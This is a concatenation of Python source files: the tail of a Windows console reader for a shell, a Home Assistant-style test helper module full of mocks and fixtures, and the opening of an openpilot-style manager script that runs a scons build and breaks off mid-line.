args=(self, fd, self.buffer, chunksize) ) self.thread.daemon = True self.thread.start() def _expand_console_buffer(cols, max_offset, expandsize, orig_posize, fd): # if we are getting close to the end of the console buffer, # expand it so that we can read from it successfully. if cols == 0: return orig_posize[-1], max_offset, orig_posize rows = ((max_offset + expandsize) // cols) + 1 xli.winutils.set_console_screen_buffer_size(cols, rows, fd=fd) orig_posize = orig_posize[:3] + (rows,) max_offset = (rows - 1) * cols return rows, max_offset, orig_posize def populate_console(reader, fd, buffer, chunksize, queue, expandsize=None): """Reads bytes from the file descriptor and puts lines into the queue. The reads happened in parallel, using xonsh.winutils.read_console_output_character(), and is thus only available on windows. If the read fails for any reason, the reader is flagged as closed. """ # OK, so this function is super annoying because Windows stores its # buffers as a 2D regular, dense array -- without trailing newlines. # Meanwhile, we want to add *lines* to the queue. Also, as is typical # with parallel reads, the entire buffer that you ask for may not be # filled. Thus we have to deal with the full generality. # 1. reads may end in the middle of a line # 2. excess whitespace at the end of a line may not be real, unless # 3. you haven't read to the end of the line yet! # So there are alignment issues everywhere. Also, Windows will automatically # read past the current cursor position, even though there is presumably # nothing to see there. # # These chunked reads basically need to happen like this because, # a. The default buffer size is HUGE for the console (90k lines x 120 cols) # as so we can't just read in everything at the end and see what we # care about without a noticeable performance hit. # b. Even with this huge size, it is still possible to write more lines than # this, so we should scroll along with the console. # Unfortunately, because we do not have control over the terminal emulator, # It is not possible to compute how far back we should set the beginning # read position because we don't know how many characters have been popped # off the top of the buffer. If we did somehow know this number we could do # something like the following: # # new_offset = (y*cols) + x # if new_offset == max_offset: # new_offset -= scrolled_offset # x = new_offset%cols # y = new_offset//cols # continue # # So this method is imperfect and only works as long as the screen has # room to expand to. Thus the trick here is to expand the screen size # when we get close enough to the end of the screen. There remain some # async issues related to not being able to set the cursor position. # but they just affect the alignment / capture of the output of the # first command run after a screen resize. if expandsize is None: expandsize = 100 * chunksize x, y, cols, rows = posize = xli.winutils.get_position_size(fd) pre_x = pre_y = -1 orig_posize = posize offset = (cols * y) + x max_offset = (rows - 1) * cols # I believe that there is a bug in PTK that if we reset the # cursor position, the cursor on the next prompt is accidentally on # the next line. If this is fixed, uncomment the following line. # if max_offset < offset + expandsize: # rows, max_offset, orig_posize = _expand_console_buffer( # cols, max_offset, expandsize, # orig_posize, fd) # winutils.set_console_cursor_position(x, y, fd=fd) while True: posize = xli.winutils.get_position_size(fd) offset = (cols * y) + x if ((posize[1], posize[0]) <= (y, x) and posize[2:] == (cols, rows)) or ( pre_x == x and pre_y == y ): # already at or ahead of the current cursor position. if reader.closed: break else: time.sleep(reader.timeout) continue elif max_offset <= offset + expandsize: ecb = _expand_console_buffer(cols, max_offset, expandsize, orig_posize, fd) rows, max_offset, orig_posize = ecb continue elif posize[2:] == (cols, rows): # cursor updated but screen size is the same. pass else: # screen size changed, which is offset preserving orig_posize = posize cols, rows = posize[2:] x = offset % cols y = offset // cols pre_x = pre_y = -1 max_offset = (rows - 1) * cols continue try: buf = xli.winutils.read_console_output_character( x=x, y=y, fd=fd, buf=buffer, bufsize=chunksize, raw=True ) except OSError: reader.closed = True break # cursor position and offset if not reader.closed: buf = buf.rstrip() nread = len(buf) if nread == 0: time.sleep(reader.timeout) continue cur_x, cur_y = posize[0], posize[1] cur_offset = (cols * cur_y) + cur_x beg_offset = (cols * y) + x end_offset = beg_offset + nread if end_offset > cur_offset and cur_offset != max_offset: buf = buf[: cur_offset - end_offset] # convert to lines xshift = cols - x yshift = (nread // cols) + (1 if nread % cols > 0 else 0) lines = [buf[:xshift]] lines += [ buf[l * cols + xshift : (l + 1) * cols + xshift] for l in range(yshift) # noqa ] lines = [line for line in lines if line] if not lines: time.sleep(reader.timeout) continue # put lines in the queue nl = b"\n" for line in lines[:-1]: queue.put(line.rstrip() + nl) if len(lines[-1]) == xshift: queue.put(lines[-1].rstrip() + nl) else: queue.put(lines[-1]) # update x and y locations if (beg_offset + len(buf)) % cols == 0: new_offset = beg_offset + len(buf) else: new_offset = beg_offset + len(buf.rstrip()) pre_x = x pre_y = y x = new_offset % cols y = new_offset // cols time.sleep(reader.timeout) class ConsoleParallelReader(QueueReader): """Parallel reader for consoles that runs in a background thread. This is only needed, available, and useful on Windows. """ def __init__(self, fd, buffer=None, chunksize=1024, timeout=None): """ Parameters ---------- fd : int Standard buffer file descriptor, 0 for stdin, 1 for stdout (default), and 2 for stderr. buffer : ctypes.c_wchar_p, optional An existing buffer to (re-)use. chunksize : int, optional The max size of the parallel reads, default 1 kb. timeout : float, optional The queue reading timeout. """ timeout = timeout or XSH.env.get("XONSH_PROC_FREQUENCY") super().__init__(fd, timeout=timeout) self._buffer = buffer # this cannot be public if buffer is None: self._buffer = ctypes.c_char_p(b" " * chunksize) self.chunksize = chunksize # start reading from stream self.thread = threading.Thread( target=populate_console, args=(self, fd, self._buffer, chunksize, self.queue), ) self.thread.daemon = True self.thread.start() def safe_fdclose(handle, cache=None): """Closes a file handle in the safest way possible, and potentially storing the result. """ if cache is not None and cache.get(handle, False): return status = True if handle is None: pass elif isinstance(handle, int): if handle >= 3: # don't close stdin, stdout, stderr, -1 try: os.close(handle) except OSError: status = False elif handle is sys.stdin or handle is sys.stdout or handle is sys.stderr: # don't close stdin, stdout, or stderr pass else: try: handle.close() except OSError: status = False if cache is not None: cache[handle] = status
common.py
"""Test the helper method for writing tests.""" import asyncio import collections from collections import OrderedDict from contextlib import contextmanager from datetime import timedelta import functools as ft from io import StringIO import json import logging import os import sys import threading import time import uuid from aiohttp.test_utils import unused_port as get_test_instance_port # noqa from homeassistant import auth, config_entries, core as ha, loader from homeassistant.auth import ( auth_store, models as auth_models, permissions as auth_permissions, providers as auth_providers, ) from homeassistant.auth.permissions import system_policies from homeassistant.components import recorder from homeassistant.components.device_automation import ( # noqa: F401 _async_get_device_automation_capabilities as async_get_device_automation_capabilities, _async_get_device_automations as async_get_device_automations, ) from homeassistant.components.mqtt.models import Message from homeassistant.config import async_process_component_config from homeassistant.const import ( ATTR_DISCOVERED, ATTR_SERVICE, DEVICE_DEFAULT_NAME, EVENT_HOMEASSISTANT_CLOSE, EVENT_PLATFORM_DISCOVERED, EVENT_STATE_CHANGED, EVENT_TIME_CHANGED, STATE_OFF, STATE_ON, ) from homeassistant.core import State from homeassistant.helpers import ( area_registry, device_registry, entity, entity_platform, entity_registry, intent, restore_state, storage, ) from homeassistant.helpers.json import JSONEncoder from homeassistant.setup import setup_component from homeassistant.util.async_ import run_callback_threadsafe import homeassistant.util.dt as date_util from homeassistant.util.unit_system import METRIC_SYSTEM import homeassistant.util.yaml.loader as yaml_loader from tests.async_mock import AsyncMock, Mock, patch _LOGGER = logging.getLogger(__name__) INSTANCES = [] CLIENT_ID = "https://example.com/app" CLIENT_REDIRECT_URI = "https://example.com/app/callback" def threadsafe_callback_factory(func): """Create threadsafe functions out of callbacks. Callback needs to have `hass` as first argument. """ @ft.wraps(func) def threadsafe(*args, **kwargs): """Call func threadsafe.""" hass = args[0] return run_callback_threadsafe( hass.loop, ft.partial(func, *args, **kwargs) ).result() return threadsafe def threadsafe_coroutine_factory(func): """Create threadsafe functions out of coroutine. Callback needs to have `hass` as first argument. """ @ft.wraps(func) def threadsafe(*args, **kwargs): """Call func threadsafe.""" hass = args[0] return asyncio.run_coroutine_threadsafe( func(*args, **kwargs), hass.loop ).result() return threadsafe def get_test_config_dir(*add_path): """Return a path to a test config dir.""" return os.path.join(os.path.dirname(__file__), "testing_config", *add_path) def get_test_home_assistant(): """Return a Home Assistant object pointing at test config directory.""" if sys.platform == "win32": loop = asyncio.ProactorEventLoop() else: loop = asyncio.new_event_loop() asyncio.set_event_loop(loop) hass = loop.run_until_complete(async_test_home_assistant(loop)) stop_event = threading.Event() def run_loop(): """Run event loop.""" # pylint: disable=protected-access loop._thread_ident = threading.get_ident() loop.run_forever() stop_event.set() orig_stop = hass.stop def start_hass(*mocks): """Start hass.""" asyncio.run_coroutine_threadsafe(hass.async_start(), loop).result() def stop_hass(): """Stop hass.""" orig_stop() stop_event.wait() loop.close() hass.start = start_hass hass.stop = stop_hass threading.Thread(name="LoopThread", target=run_loop, daemon=False).start() return hass # pylint: disable=protected-access async def async_test_home_assistant(loop): """Return a Home Assistant object pointing at test config dir.""" hass = ha.HomeAssistant() store = auth_store.AuthStore(hass) hass.auth = auth.AuthManager(hass, store, {}, {}) ensure_auth_manager_loaded(hass.auth) INSTANCES.append(hass) orig_async_add_job = hass.async_add_job orig_async_add_executor_job = hass.async_add_executor_job orig_async_create_task = hass.async_create_task def async_add_job(target, *args): """Add job.""" check_target = target while isinstance(check_target, ft.partial): check_target = check_target.func if isinstance(check_target, Mock) and not isinstance(target, AsyncMock): fut = asyncio.Future() fut.set_result(target(*args)) return fut return orig_async_add_job(target, *args) def async_add_executor_job(target, *args): """Add executor job.""" check_target = target while isinstance(check_target, ft.partial): check_target = check_target.func if isinstance(check_target, Mock): fut = asyncio.Future() fut.set_result(target(*args)) return fut return orig_async_add_executor_job(target, *args) def async_create_task(coroutine): """Create task.""" if isinstance(coroutine, Mock) and not isinstance(coroutine, AsyncMock): fut = asyncio.Future() fut.set_result(None) return fut return orig_async_create_task(coroutine) hass.async_add_job = async_add_job hass.async_add_executor_job = async_add_executor_job hass.async_create_task = async_create_task hass.config.location_name = "test home" hass.config.config_dir = get_test_config_dir() hass.config.latitude = 32.87336 hass.config.longitude = -117.22743 hass.config.elevation = 0 hass.config.time_zone = date_util.get_time_zone("US/Pacific") hass.config.units = METRIC_SYSTEM hass.config.skip_pip = True hass.config_entries = config_entries.ConfigEntries(hass, {}) hass.config_entries._entries = [] hass.config_entries._store._async_ensure_stop_listener = lambda: None hass.state = ha.CoreState.running # Mock async_start orig_start = hass.async_start async def mock_async_start(): """Start the mocking.""" # We only mock time during tests and we want to track tasks with patch("homeassistant.core._async_create_timer"), patch.object( hass, "async_stop_track_tasks" ): await orig_start() hass.async_start = mock_async_start @ha.callback def clear_instance(event): """Clear global instance.""" INSTANCES.remove(hass) hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance) return hass def async_mock_service(hass, domain, service, schema=None): """Set up a fake service & return a calls log list to this service.""" calls = [] @ha.callback def mock_service_log(call): # pylint: disable=unnecessary-lambda """Mock service call.""" calls.append(call) hass.services.async_register(domain, service, mock_service_log, schema=schema) return calls mock_service = threadsafe_callback_factory(async_mock_service) @ha.callback def async_mock_intent(hass, intent_typ): """Set up a fake intent handler.""" intents = [] class MockIntentHandler(intent.IntentHandler): intent_type = intent_typ async def async_handle(self, intent): """Handle the intent.""" intents.append(intent) return intent.create_response() intent.async_register(hass, MockIntentHandler()) return intents @ha.callback def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False): """Fire the MQTT message.""" if isinstance(payload, str): payload = payload.encode("utf-8") msg = Message(topic, payload, qos, retain) hass.data["mqtt"]._mqtt_handle_message(msg) fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message) @ha.callback def async_fire_time_changed(hass, datetime_, fire_all=False): """Fire a time changes event.""" hass.bus.async_fire(EVENT_TIME_CHANGED, {"now": date_util.as_utc(datetime_)}) for task in list(hass.loop._scheduled): if not isinstance(task, asyncio.TimerHandle): continue if task.cancelled(): continue mock_seconds_into_future = datetime_.timestamp() - time.time() future_seconds = task.when() - hass.loop.time() if fire_all or mock_seconds_into_future >= future_seconds: with patch( "homeassistant.helpers.event.pattern_utc_now", return_value=date_util.as_utc(datetime_), ): task._run() task.cancel() fire_time_changed = threadsafe_callback_factory(async_fire_time_changed) def fire_service_discovered(hass, service, info): """Fire the MQTT message.""" hass.bus.fire( EVENT_PLATFORM_DISCOVERED, {ATTR_SERVICE: service, ATTR_DISCOVERED: info} ) @ha.callback def async_fire_service_discovered(hass, service, info): """Fire the MQTT message.""" hass.bus.async_fire( EVENT_PLATFORM_DISCOVERED, {ATTR_SERVICE: service, ATTR_DISCOVERED: info} ) def load_fixture(filename): """Load a fixture.""" path = os.path.join(os.path.dirname(__file__), "fixtures", filename) with open(path, encoding="utf-8") as fptr: return fptr.read() def mock_state_change_event(hass, new_state, old_state=None): """Mock state change envent.""" event_data = {"entity_id": new_state.entity_id, "new_state": new_state} if old_state: event_data["old_state"] = old_state hass.bus.fire(EVENT_STATE_CHANGED, event_data, context=new_state.context) @ha.callback def mock_component(hass, component): """Mock a component is setup.""" if component in hass.config.components: AssertionError(f"Integration {component} is already setup") hass.config.components.add(component) def mock_registry(hass, mock_entries=None): """Mock the Entity Registry.""" registry = entity_registry.EntityRegistry(hass) registry.entities = mock_entries or OrderedDict() registry._rebuild_index() hass.data[entity_registry.DATA_REGISTRY] = registry return registry def mock_area_registry(hass, mock_entries=None): """Mock the Area Registry.""" registry = area_registry.AreaRegistry(hass) registry.areas = mock_entries or OrderedDict() hass.data[area_registry.DATA_REGISTRY] = registry return registry def mock_device_registry(hass, mock_entries=None, mock_deleted_entries=None): """Mock the Device Registry.""" registry = device_registry.DeviceRegistry(hass) registry.devices = mock_entries or OrderedDict() registry.deleted_devices = mock_deleted_entries or OrderedDict() registry._rebuild_index() hass.data[device_registry.DATA_REGISTRY] = registry return registry class MockGroup(auth_models.Group): """Mock a group in Home Assistant.""" def __init__(self, id=None, name="Mock Group", policy=system_policies.ADMIN_POLICY): """Mock a group.""" kwargs = {"name": name, "policy": policy} if id is not None: kwargs["id"] = id super().__init__(**kwargs) def add_to_hass(self, hass): """Test helper to add entry to hass.""" return self.add_to_auth_manager(hass.auth) def add_to_auth_manager(self, auth_mgr): """Test helper to add entry to hass.""" ensure_auth_manager_loaded(auth_mgr) auth_mgr._store._groups[self.id] = self return self class MockUser(auth_models.User): """Mock a user in Home Assistant.""" def __init__( self, id=None, is_owner=False, is_active=True, name="Mock User", system_generated=False, groups=None, ): """Initialize mock user.""" kwargs = { "is_owner": is_owner, "is_active": is_active, "name": name, "system_generated": system_generated, "groups": groups or [], "perm_lookup": None, } if id is not None: kwargs["id"] = id super().__init__(**kwargs) def add_to_hass(self, hass): """Test helper to add entry to hass.""" return self.add_to_auth_manager(hass.auth) def add_to_auth_manager(self, auth_mgr): """Test helper to add entry to hass.""" ensure_auth_manager_loaded(auth_mgr) auth_mgr._store._users[self.id] = self return self def mock_policy(self, policy): """Mock a policy for a user.""" self._permissions = auth_permissions.PolicyPermissions(policy, self.perm_lookup) async def register_auth_provider(hass, config): """Register an auth provider.""" provider = await auth_providers.auth_provider_from_config( hass, hass.auth._store, config ) assert provider is not None, "Invalid config specified" key = (provider.type, provider.id) providers = hass.auth._providers if key in providers: raise ValueError("Provider already registered") providers[key] = provider return provider @ha.callback def ensure_auth_manager_loaded(auth_mgr): """Ensure an auth manager is considered loaded.""" store = auth_mgr._store if store._users is None: store._set_defaults() class MockModule: """Representation of a fake module.""" # pylint: disable=invalid-name def __init__( self, domain=None, dependencies=None, setup=None, requirements=None, config_schema=None, platform_schema=None, platform_schema_base=None, async_setup=None, async_setup_entry=None, async_unload_entry=None, async_migrate_entry=None, async_remove_entry=None, partial_manifest=None, ): """Initialize the mock module.""" self.__name__ = f"homeassistant.components.{domain}" self.__file__ = f"homeassistant/components/{domain}" self.DOMAIN = domain self.DEPENDENCIES = dependencies or [] self.REQUIREMENTS = requirements or [] # Overlay to be used when generating manifest from this module self._partial_manifest = partial_manifest if config_schema is not None: self.CONFIG_SCHEMA = config_schema if platform_schema is not None: self.PLATFORM_SCHEMA = platform_schema if platform_schema_base is not None: self.PLATFORM_SCHEMA_BASE = platform_schema_base if setup is not None: # We run this in executor, wrap it in function self.setup = lambda *args: setup(*args) if async_setup is not None: self.async_setup = async_setup if setup is None and async_setup is None: self.async_setup = AsyncMock(return_value=True) if async_setup_entry is not None: self.async_setup_entry = async_setup_entry if async_unload_entry is not None: self.async_unload_entry = async_unload_entry if async_migrate_entry is not None: self.async_migrate_entry = async_migrate_entry if async_remove_entry is not None: self.async_remove_entry = async_remove_entry def mock_manifest(self): """Generate a mock manifest to represent this module.""" return { **loader.manifest_from_legacy_module(self.DOMAIN, self), **(self._partial_manifest or {}), } class MockPlatform: """Provide a fake platform.""" __name__ = "homeassistant.components.light.bla" __file__ = "homeassistant/components/blah/light" # pylint: disable=invalid-name def __init__( self, setup_platform=None, dependencies=None, platform_schema=None, async_setup_platform=None, async_setup_entry=None, scan_interval=None, ): """Initialize the platform.""" self.DEPENDENCIES = dependencies or [] if platform_schema is not None: self.PLATFORM_SCHEMA = platform_schema if scan_interval is not None: self.SCAN_INTERVAL = scan_interval if setup_platform is not None: # We run this in executor, wrap it in function self.setup_platform = lambda *args: setup_platform(*args) if async_setup_platform is not None: self.async_setup_platform = async_setup_platform if async_setup_entry is not None: self.async_setup_entry = async_setup_entry if setup_platform is None and async_setup_platform is None: self.async_setup_platform = AsyncMock(return_value=None) class MockEntityPlatform(entity_platform.EntityPlatform): """Mock class with some mock defaults.""" def __init__( self, hass, logger=None, domain="test_domain", platform_name="test_platform", platform=None, scan_interval=timedelta(seconds=15), entity_namespace=None, ): """Initialize a mock entity platform.""" if logger is None: logger = logging.getLogger("homeassistant.helpers.entity_platform") # Otherwise the constructor will blow up. if isinstance(platform, Mock) and isinstance(platform.PARALLEL_UPDATES, Mock): platform.PARALLEL_UPDATES = 0 super().__init__( hass=hass, logger=logger, domain=domain, platform_name=platform_name, platform=platform, scan_interval=scan_interval, entity_namespace=entity_namespace, ) class MockToggleEntity(entity.ToggleEntity): """Provide a mock toggle device.""" def __init__(self, name, state, unique_id=None): """Initialize the mock entity.""" self._name = name or DEVICE_DEFAULT_NAME self._state = state self.calls = [] @property def name(self): """Return the name of the entity if any.""" self.calls.append(("name", {})) return self._name @property def state(self): """Return the state of the entity if any.""" self.calls.append(("state", {})) return self._state @property def is_on(self): """Return true if entity is on.""" self.calls.append(("is_on", {})) return self._state == STATE_ON def turn_on(self, **kwargs): """Turn the entity on.""" self.calls.append(("turn_on", kwargs)) self._state = STATE_ON def turn_off(self, **kwargs): """Turn the entity off.""" self.calls.append(("turn_off", kwargs)) self._state = STATE_OFF def last_call(self, method=None): """Return the last call.""" if not self.calls: return None if method is None: return self.calls[-1] try: return next(call for call in reversed(self.calls) if call[0] == method) except StopIteration: return None class MockConfigEntry(config_entries.ConfigEntry): """Helper for creating config entries that adds some defaults.""" def __init__( self, *, domain="test", data=None, version=1, entry_id=None, source=config_entries.SOURCE_USER, title="Mock Title", state=None, options={}, system_options={}, connection_class=config_entries.CONN_CLASS_UNKNOWN, unique_id=None, ): """Initialize a mock config entry.""" kwargs = { "entry_id": entry_id or uuid.uuid4().hex, "domain": domain, "data": data or {}, "system_options": system_options, "options": options, "version": version, "title": title, "connection_class": connection_class, "unique_id": unique_id, } if source is not None: kwargs["source"] = source if state is not None: kwargs["state"] = state super().__init__(**kwargs) def add_to_hass(self, hass): """Test helper to add entry to hass.""" hass.config_entries._entries.append(self) def add_to_manager(self, manager): """Test helper to add entry to entry manager.""" manager._entries.append(self) def patch_yaml_files(files_dict, endswith=True): """Patch load_yaml with a dictionary of yaml files.""" # match using endswith, start search with longest string matchlist = sorted(list(files_dict.keys()), key=len) if endswith else [] def mock_open_f(fname, **_): """Mock open() in the yaml module, used by load_yaml.""" # Return the mocked file on full match if fname in files_dict: _LOGGER.debug("patch_yaml_files match %s", fname) res = StringIO(files_dict[fname]) setattr(res, "name", fname) return res # Match using endswith for ends in matchlist: if fname.endswith(ends): _LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname) res = StringIO(files_dict[ends]) setattr(res, "name", fname) return res # Fallback for hass.components (i.e. services.yaml) if "homeassistant/components" in fname: _LOGGER.debug("patch_yaml_files using real file: %s", fname) return open(fname, encoding="utf-8") # Not found raise FileNotFoundError(f"File not found: {fname}") return patch.object(yaml_loader, "open", mock_open_f, create=True) def mock_coro(return_value=None, exception=None): """Return a coro that returns a value or raise an exception.""" fut = asyncio.Future() if exception is not None: fut.set_exception(exception) else: fut.set_result(return_value) return fut @contextmanager def assert_setup_component(count, domain=None): """Collect valid configuration from setup_component. - count: The amount of valid platforms that should be setup - domain: The domain to count is optional. It can be automatically determined most of the time Use as a context manager around setup.setup_component with assert_setup_component(0) as result_config: setup_component(hass, domain, start_config) # using result_config is optional """ config = {} async def mock_psc(hass, config_input, integration): """Mock the prepare_setup_component to capture config.""" domain_input = integration.domain res = await async_process_component_config(hass, config_input, integration) config[domain_input] = None if res is None else res.get(domain_input) _LOGGER.debug( "Configuration for %s, Validated: %s, Original %s", domain_input, config[domain_input], config_input.get(domain_input), ) return res assert isinstance(config, dict) with patch("homeassistant.config.async_process_component_config", mock_psc): yield config if domain is None: assert len(config) == 1, "assert_setup_component requires DOMAIN: {}".format( list(config.keys()) ) domain = list(config.keys())[0] res = config.get(domain) res_len = 0 if res is None else len(res) assert ( res_len == count ), f"setup_component failed, expected {count} got {res_len}: {res}" def init_recorder_component(hass, add_config=None): """Initialize the recorder.""" config = dict(add_config) if add_config else {} config[recorder.CONF_DB_URL] = "sqlite://" # In memory DB with patch("homeassistant.components.recorder.migration.migrate_schema"): assert setup_component(hass, recorder.DOMAIN, {recorder.DOMAIN: config}) assert recorder.DOMAIN in hass.config.components _LOGGER.info("In-memory recorder successfully started") def mock_restore_cache(hass, states): """Mock the DATA_RESTORE_CACHE.""" key = restore_state.DATA_RESTORE_STATE_TASK data = restore_state.RestoreStateData(hass) now = date_util.utcnow() last_states = {} for state in states: restored_state = state.as_dict() restored_state["attributes"] = json.loads( json.dumps(restored_state["attributes"], cls=JSONEncoder) ) last_states[state.entity_id] = restore_state.StoredState( State.from_dict(restored_state), now ) data.last_states = last_states _LOGGER.debug("Restore cache: %s", data.last_states) assert len(data.last_states) == len(states), f"Duplicate entity_id? {states}" hass.data[key] = data class MockEntity(entity.Entity): """Mock Entity class.""" def __init__(self, **values): """Initialize an entity.""" self._values = values if "entity_id" in values: self.entity_id = values["entity_id"] @property def name(self): """Return the name of the entity.""" return self._handle("name") @property def should_poll(self): """Return the ste of the polling.""" return self._handle("should_poll") @property def unique_id(self): """Return the unique ID of the entity.""" return self._handle("unique_id") @property def state(self): """Return the state of the entity.""" return self._handle("state") @property def available(self): """Return True if entity is available.""" return self._handle("available") @property def device_info(self): """Info how it links to a device.""" return self._handle("device_info") @property def device_class(self): """Info how device should be classified.""" return self._handle("device_class") @property def unit_of_measurement(self): """Info on the units the entity state is in.""" return self._handle("unit_of_measurement") @property def capability_attributes(self): """Info about capabilities.""" return self._handle("capability_attributes") @property def supported_features(self): """Info about supported features.""" return self._handle("supported_features") @property def entity_registry_enabled_default(self): """Return if the entity should be enabled when first added to the entity registry.""" return self._handle("entity_registry_enabled_default") def _handle(self, attr): """Return attribute value.""" if attr in self._values: return self._values[attr] return getattr(super(), attr) @contextmanager def mock_storage(data=None): """Mock storage. Data is a dict {'key': {'version': version, 'data': data}} Written data will be converted to JSON to ensure JSON parsing works. """ if data is None: data = {} orig_load = storage.Store._async_load async def mock_async_load(store): """Mock version of load.""" if store._data is None: # No data to load if store.key not in data: return None mock_data = data.get(store.key) if "data" not in mock_data or "version" not in mock_data: _LOGGER.error('Mock data needs "version" and "data"') raise ValueError('Mock data needs "version" and "data"') store._data = mock_data # Route through original load so that we trigger migration loaded = await orig_load(store) _LOGGER.info("Loading data for %s: %s", store.key, loaded) return loaded def mock_write_data(store, path, data_to_write): """Mock version of write data.""" _LOGGER.info("Writing data to %s: %s", store.key, data_to_write) # To ensure that the data can be serialized data[store.key] = json.loads(json.dumps(data_to_write, cls=store._encoder)) async def mock_remove(store): """Remove data.""" data.pop(store.key, None) with patch( "homeassistant.helpers.storage.Store._async_load", side_effect=mock_async_load, autospec=True, ), patch( "homeassistant.helpers.storage.Store._write_data", side_effect=mock_write_data, autospec=True, ), patch( "homeassistant.helpers.storage.Store.async_remove", side_effect=mock_remove, autospec=True, ): yield data async def flush_store(store): """Make sure all delayed writes of a store are written.""" if store._data is None: return store._async_cleanup_final_write_listener() store._async_cleanup_delay_listener() await store._async_handle_write_data() async def get_system_health_info(hass, domain): """Get system health info.""" return await hass.data["system_health"]["info"][domain](hass) def mock_integration(hass, module): """Mock an integration.""" integration = loader.Integration( hass, f"homeassistant.components.{module.DOMAIN}", None, module.mock_manifest() ) _LOGGER.info("Adding mock integration: %s", module.DOMAIN) hass.data.setdefault(loader.DATA_INTEGRATIONS, {})[module.DOMAIN] = integration hass.data.setdefault(loader.DATA_COMPONENTS, {})[module.DOMAIN] = module return integration def mock_entity_platform(hass, platform_path, module): """Mock a entity platform. platform_path is in form light.hue. Will create platform hue.light. """ domain, platform_name = platform_path.split(".") mock_platform(hass, f"{platform_name}.{domain}", module) def mock_platform(hass, platform_path, module=None): """Mock a platform. platform_path is in form hue.config_flow. """ domain, platform_name = platform_path.split(".") integration_cache = hass.data.setdefault(loader.DATA_INTEGRATIONS, {}) module_cache = hass.data.setdefault(loader.DATA_COMPONENTS, {}) if domain not in integration_cache: mock_integration(hass, MockModule(domain)) _LOGGER.info("Adding mock integration platform: %s", platform_path) module_cache[platform_path] = module or Mock() def async_capture_events(hass, event_name): """Create a helper that captures events.""" events = [] @ha.callback def capture_events(event): events.append(event) hass.bus.async_listen(event_name, capture_events) return events @ha.callback def async_mock_signal(hass, signal): """Catch all dispatches to a signal.""" calls = [] @ha.callback def mock_signal_handler(*args): """Mock service call.""" calls.append(args) hass.helpers.dispatcher.async_dispatcher_connect(signal, mock_signal_handler) return calls class hashdict(dict): """ hashable dict implementation, suitable for use as a key into other dicts. >>> h1 = hashdict({"apples": 1, "bananas":2}) >>> h2 = hashdict({"bananas": 3, "mangoes": 5}) >>> h1+h2 hashdict(apples=1, bananas=3, mangoes=5) >>> d1 = {} >>> d1[h1] = "salad" >>> d1[h1] 'salad' >>> d1[h2] Traceback (most recent call last): ... KeyError: hashdict(bananas=3, mangoes=5) based on answers from http://stackoverflow.com/questions/1151658/python-hashable-dicts """ def __key(self): return tuple(sorted(self.items())) def __repr__(self): # noqa: D105 no docstring return ", ".join(f"{i[0]!s}={i[1]!r}" for i in self.__key()) def __hash__(self): # noqa: D105 no docstring return hash(self.__key()) def __setitem__(self, key, value): # noqa: D105 no docstring raise TypeError(f"{self.__class__.__name__} does not support item assignment") def __delitem__(self, key): # noqa: D105 no docstring raise TypeError(f"{self.__class__.__name__} does not support item assignment") def clear(self): # noqa: D102 no docstring raise TypeError(f"{self.__class__.__name__} does not support item assignment") def pop(self, *args, **kwargs): # noqa: D102 no docstring raise TypeError(f"{self.__class__.__name__} does not support item assignment") def popitem(self, *args, **kwargs): # noqa: D102 no docstring raise TypeError(f"{self.__class__.__name__} does not support item assignment") def setdefault(self, *args, **kwargs): # noqa: D102 no docstring raise TypeError(f"{self.__class__.__name__} does not support item assignment") def update(self, *args, **kwargs): # noqa: D102 no docstring raise TypeError(f"{self.__class__.__name__} does not support item assignment") # update is not ok because it mutates the object # __add__ is ok because it creates a new object # while the new object is under construction, it's ok to mutate it def __add__(self, right): # noqa: D105 no docstring result = hashdict(self) dict.update(result, right) return result def assert_lists_same(a, b): """Compare two lists, ignoring order.""" assert collections.Counter([hashdict(i) for i in a]) == collections.Counter( [hashdict(i) for i in b] )
manager.py
#!/usr/bin/env python3 import os import time import sys import fcntl import errno import signal import shutil import subprocess import datetime import textwrap from typing import Dict, List from selfdrive.swaglog import cloudlog, add_logentries_handler from common.basedir import BASEDIR from common.hardware import HARDWARE, ANDROID, PC WEBCAM = os.getenv("WEBCAM") is not None sys.path.append(os.path.join(BASEDIR, "pyextra")) os.environ['BASEDIR'] = BASEDIR TOTAL_SCONS_NODES = 1040 prebuilt = os.path.exists(os.path.join(BASEDIR, 'prebuilt')) # Create folders needed for msgq try: os.mkdir("/dev/shm") except FileExistsError: pass except PermissionError: print("WARNING: failed to make /dev/shm") if ANDROID: os.chmod("/dev/shm", 0o777) def unblock_stdout(): # get a non-blocking stdout child_pid, child_pty = os.forkpty() if child_pid != 0: # parent # child is in its own process group, manually pass kill signals signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT)) signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM)) fcntl.fcntl(sys.stdout, fcntl.F_SETFL, fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK) while True: try: dat = os.read(child_pty, 4096) except OSError as e: if e.errno == errno.EIO: break continue if not dat: break try: sys.stdout.write(dat.decode('utf8')) except (OSError, IOError, UnicodeDecodeError): pass # os.wait() returns a tuple with the pid and a 16 bit value # whose low byte is the signal number and whose high byte is the exit satus exit_status = os.wait()[1] >> 8 os._exit(exit_status) if __name__ == "__main__": unblock_stdout() from common.spinner import Spinner from common.text_window import TextWindow import importlib import traceback from multiprocessing import Process # Run scons spinner = Spinner() spinner.update("0") if not prebuilt: for retry in [True, False]: # run scons env = os.environ.copy() env['SCONS_PROGRESS'] = "1" env['SCONS_CACHE'] = "1" nproc = os.cpu_count() j_flag = "" if nproc is None else "-j8" scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE) compile_output = [] # Read progress from stderr and update spinner while scons.poll() is None: try: line = scons.stderr.readline() # type: ignore if line is None: continue line = line.rstrip() prefix = b'progress: ' if line.startswith(prefix): i = int(line[len(prefix):]) if spinner is not None: spinner.update("%d" % (70.0 * (i / TOTAL_SCONS_NODES))) elif len(line): compile_output.append(line) print(line.decode('utf8', 'replace')) except Exception: pass if scons.returncode != 0: # Read remaining output r = scons.stderr.read().split(b'\n') # type: ignore compile_output += r if retry: if not os.getenv("CI"): print("scons build failed, cleaning in") for i in range(3, -1, -1): print("....%d" % i) time.sleep(1) # subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env) # shutil.rmtree("/tmp/scons_cache") else: print("scons build 